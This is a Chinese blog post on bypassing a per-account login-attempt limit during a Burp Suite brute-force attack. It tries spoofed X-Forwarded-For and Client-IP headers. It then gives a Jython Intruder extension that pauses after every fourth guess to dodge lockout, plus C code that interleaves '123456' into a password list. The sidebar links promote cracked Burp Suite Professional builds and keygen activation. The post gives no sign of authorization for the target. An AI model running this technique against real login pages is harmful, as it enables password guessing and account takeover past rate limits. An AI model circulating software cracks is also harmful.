Burp Suite 暴力破解绕过同一账户登录次数

于 2024-08-03 19:01:28 发布
阅读量235 收藏 2
点赞数 2
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_62860907/article/details/140894962
版权

今天遇见了这样的一个登录,虽然没有验证码,但是有限制同一账号登录次数

我尝试了网上绕过的各种方法,比如说改ip,就是用bp的鱼叉模式,选中数据包中ip地址

X-Forwarded-For:127.0.0.*;
或者
client-ip:192.168.1.*

诸如此类,最终,我放弃了,我开始想另一种方法,在网上浏览,无意间发现Burp Suite可以使用python脚本语言,我就在想是不是可以让每三次登录然后暂停一分钟,要不然压根无计可施,找寻资料后,我发现它是由JYTHON实现的,于是我登录官网下载了JYTHON的jar包开始导入

找到如图所示的地方,添加jar包,我用的是官网的最新版

https://www.jython.org/download

下载之后进行添加结束后,开始写python脚本

# coding=utf-8
import time
from burp import IBurpExtender
from burp import IIntruderPayloadProcessor

class BurpExtender(IBurpExtender, IIntruderPayloadProcessor):
    def registerExtenderCallbacks(self, callbacks):
        self._callbacks = callbacks
        self._helpers = callbacks.getHelpers()
        callbacks.setExtensionName("Login Pause After 3 Attempts")
        callbacks.registerIntruderPayloadProcessor(self)
        self.login_attempts = 0

    def getProcessorName(self):
        return "Login Pause Processor"

    def processPayload(self, currentPayload, originalPayload, baseValue):
        self.login_attempts += 1

        if self.login_attempts % 4 == 0:
            print("暂停1分钟...")
            time.sleep(65)  # 暂停60秒

        return currentPayload

代码由gpt生成,我将每三次修改成了每四次停止一次,时间也由60秒修改为65,然后用C语言,在我的密码本上每三行后面添加一行123456

#include <stdio.h>
#include <stdlib.h>

int main() {
    FILE *fpIn, *fpOut;
    char line[1024]; // 假设每行不超过1023个字符加上一个换行符
    int count = 0;

    // 打开原始文件用于读取
    fpIn = fopen("input.txt", "r");
    if (fpIn == NULL) {
        perror("Error opening file");
        return -1;
    }

    // 打开(或创建)输出文件用于写入
    fpOut = fopen("output.txt", "w");
    if (fpOut == NULL) {
        fclose(fpIn); // 不要忘记关闭已打开的文件
        perror("Error opening file");
        return -1;
    }

    // 逐行读取并写入
    while (fgets(line, sizeof(line), fpIn)) {
        fputs(line, fpOut); // 写入当前行到输出文件
        count++; // 更新行计数器

        // 每三行后插入"123456"
        if (count % 3 == 0) {
            fputs("123456\n", fpOut);
        }
    }

    // 关闭文件
    fclose(fpIn);
    fclose(fpOut);

    return 0;
}

加载py脚本进入bp

启动,虽然一分钟三个密码有点慢,但是没办法,这种限制只能如此

馡廊遗梦
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BURPSUITE中的暴力破解
bathtml的博客
06-22 1993
BURPSUITE中的暴力破解 BURPSUITE是一款攻击web应用程序的集成平台,非常实用,个人版是免费的,但是个人推荐企业版。其中包括Proxy,Spider,Scanner,Intruder,Repeater,Sequencer,Decoder,Comparer功能。暴力破解主要使用Proxy和Intruder模块。 首先,进入Proxy中的options功能,其中默认的地址是127.0.0.1,端口是8080。 接着,我们将浏览器代理设置为上面的地址和端口(各个浏览器的设置方式有所不同,此处以fi
burpsuite汉化破解版
03-28
burpsuite1.7.26永久免破解版,此软件由java语言编写,故运行需要安装jdk。建议安装jdk1.8.X版本(目前最稳定版本)下载和安装及环境变量设置自行百度 此软件为破解版,可直接运行,为英文版,汉化版需要运行汉化包...
Burp Suite暴力破解(四种攻击方式)
2301_77139301的博客
01-21 3989
用火狐浏览器进入Dvwa靶场,并修改为low级别,并打开BP代理选择Brute Force打开Burp Suite,找到代理打开拦截在靶场中,随便输入用户名,密码后登录此时发现BP已经抓到包了,可以看到刚刚输入的账号和密码然后ctrl+i发送到攻击器(Intruder),打开攻击器接下来开始尝试四种爆破攻击方式。
安全工具 | BurpSuite安装使用(保姆级教程!)
最新发布
zkaqlaoniao的博客
06-27 4425
3.点击Run -> 自动打开Burp Suite Professional4.点击 I Accept(我同意)5.复制 -> 粘贴 -> (Next)下一步6.点击 Manual activation(手动激活)7.BurpLoaderKeygen.jar(破解机的密码) 对应 Burp Suite Professional(激活的密码) 输入 -> 点击Next(下一步)8.页面提示:Success(成功) -> 点击Finish(完成)关闭激活注册页面。
BurpSuite安装破解教程
菜鸟的自学之路
04-24 1554
手动破解安装 加载Jython环境
Burp Suite暴力破解实验(问题+解决方法汇总)
qq_38651516的博客
11-16 7844
步骤: 1. 安装DVWA         1.1 将dvwa.zip文件解压并将文件名修改为dvwa,将文件拷贝到wamp安装目录下的www目录下。(安装地址)         1.2 访问http://localhost/dvwa-master,设置数据库用户名和密码(这里是访问数据库的用户名和密码,在安装wamp中设置的,如果没有设置,默认用户名为root,密码为空
使用Burpsuit简单的暴力破解pikachu
zxf13407497896的博客
10-18 1182
使用Burpsuit简单的暴力破解-pikachu
Burp Suite2.0汉化破解教程.7z
08-18
Burpsuite2.0专业版是一款功能强大的Web应用程序渗透测试集成平台,Burpsuite从应用程序攻击表面的最初映射和分析,Burp Suite2.0汉化破解教程里面有破解教程。
burpsuite破解版
10-14
burpsuite_pro_v1.4.07+破解版 Burp Suite 是用于攻击web 应用程序的集成平台,包含了许多工具。Burp Suite为这些工具设计了许多接口,以加快攻击应用程序的过程。
burp suite 1.7.26 破解版 永不过期
04-22
burpsuite1.7.26 破解版永不过期 支持linux mac windows 。在原基础上增加了bat一键运行 ,避免因为java环境问题打不开jar。windows按位数运行bat或者直接双击Burploader.jar 其他系统直接双击,32位没测试。
BurpSuite_403Bypasser:Burpsuite扩展程序绕过403受限制的目录
03-11
第403章一个burpsuite扩展名,用于绕过403受限制的目录。 通过使用PassiveScan(默认启用),此扩展名将自动扫描每个403请求,因此只需添加到burpsuite中即可。 有效负载:$ 1:HOSTNAME $ 2:PATH $1/$2$1/./$2$1/$...
Burpsuite1.7(最新破解版点开即用)
07-22
Burp Suite 是用于攻击web 应用程序的集成平台,包含了许多工具。Burp Suite为这些工具设计了许多接口,以加快攻击应用程序的过程。所有工具都共享一个请求,并能处理对应的HTTP 消息、持久性、认证、代理、日志、警报。 此版本为破解版 点开即用(需要java环境)亲测可用!!!
burpsuite安装破解及简单使用
smelllu的博客
06-21 2万+
一、破解安装篇 1、打开burp-loader-keygen.jar文件,点击右侧的Run按钮成功拉起burpsuite,将burp-loader-keygen.jar里面的License复制到打开的待破解区域; 2、点击next; 3、点击Manual activation按钮 4、再点击Copy request按钮复制此数据,将此数据粘贴放入注册机的Activation Request后的区域...
【2024最新版】BurpSuite安装和基础使用教程(已破解),三分钟手把手教会,非常简单
2401_84862291的博客
05-17 1482
打不开burp-loader-keygen.jar文件,那我们就需要在cmd中用java打开它,很多博主都没有说到这点 当时我也在这踩雷了。Burp Suite是由Java语言编写而成,而Java自身的跨平台性,使得软件的学习和使用更加方便。Burp Suite不像其他的自动化测试工具,它需要你手工的去配置一些参数,触发一些自动化流程,然后它才会开始工作。然后我们就开始使用BURP软件了,打开BP,我们选择默认临时文件就可以了,点击next。1、选中“此电脑”,右键选择“属性”。蒙开发知识点,真正体系化!
【2024最新版】BurpSuite安装和基础使用教程(已破解),三分钟手把手教会,非常简单!
热门推荐
Javachichi的博客
01-10 5万+
Burp Suite 是用于攻击web 应用程序的集成平台。它包含了许多Burp工具,这些不同的burp工具通过协同工作,有效的分享信息,支持以某种工具中的信息为基础供另一种工具使用的方式发起攻击。它主要用来做安全性渗透测试,可以实现拦截请求、Burp Spider爬虫、漏洞扫描(付费)等类似Fiddler和Postman但比其更强大的功能。那么我们开始安装教程****
网络安全工具——Burp Suite抓包工具
p36273的博客
05-18 8038
我这里安装的是Burp2021的破解版请支持正版。
面试笔试-脚本-1:使用shell脚本输出登录次数最多的用户
weixin_34050389的博客
04-17 132
原题目:  一个文本类型的文件,里面每行存放一个登陆者的IP(某些行是反复的),写一个shell脚本输出登陆次数最多的用户。 之前刚看到这个题目时,立即没有想到一行直接解决的办法,尽管知道能够先进行排序,可是后面因为对uniq命令的參数不熟悉,所以用了比較背的办法,就是直接编写shell脚本程序来解决问题。 如今如果測试数据例如以下: 111.111.111.111 10....
burpSuitPro破解安装教程
h1825819493的博客
07-12 5630
1、在解压后,如第一次使用BP请先运行 激活脚本 2、启动激活程序后点击 Run ,运行Burp 然后将 License 里面的值复制到 Burp的 key 输入框里,点击 Next : 3、接下来我们要选择使用手动激活点击 Manual activation 4、将如下输入框的值复制到 Request 框里 最后将 Response 的值复制到Burp的激活框第3步里 点击 Next ,激活成功 后续我们 运行 Burp_Chs或全汉化启动,即可正常启动啦
BurpSuite保姆级教程
zkaqlaoniao的博客
04-09 2314
3.点击Run -> 自动打开Burp Suite Professional4.点击 I Accept(我同意)5.复制 -> 粘贴 -> (Next)下一步6.点击 Manual activation(手动激活)7.BurpLoaderKeygen.jar(破解机的密码) 对应 Burp Suite Professional(激活的密码) 输入 -> 点击Next(下一步)8.页面提示:Success(成功) -> 点击Finish(完成)关闭激活注册页面。
burp suite暴力破解流程
06-09
Burp Suite 是一款功能强大的 Web 渗透测试工具,其中包含了许多模块,其中一个是 Intruder,可以用于暴力破解。下面是使用 Burp Suite Intruder 进行暴力破解的流程: 1. 在 Burp Suite 中打开要攻击的目标网站,并进行代理设置。 2. 打开 Intruder 模块,并在 Target 标签页中设置要攻击的网址。 3. 在 Positions 标签页中设置要进行暴力破解的用户名和密码字段。 4. 在 Payloads 标签页中设置用户名和密码的字典文件,并配置其他参数,如字符集、分隔符、前缀、后缀等。 5. 在 Options 标签页中设置攻击参数,如并发连接数、超时时间等。 6. 点击 Start Attack 按钮,开始进行暴力破解。 需要注意的是,暴力破解是一种不合法的攻击行为,应该在合法授权的情况下进行,否则可能会涉及违法行为。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值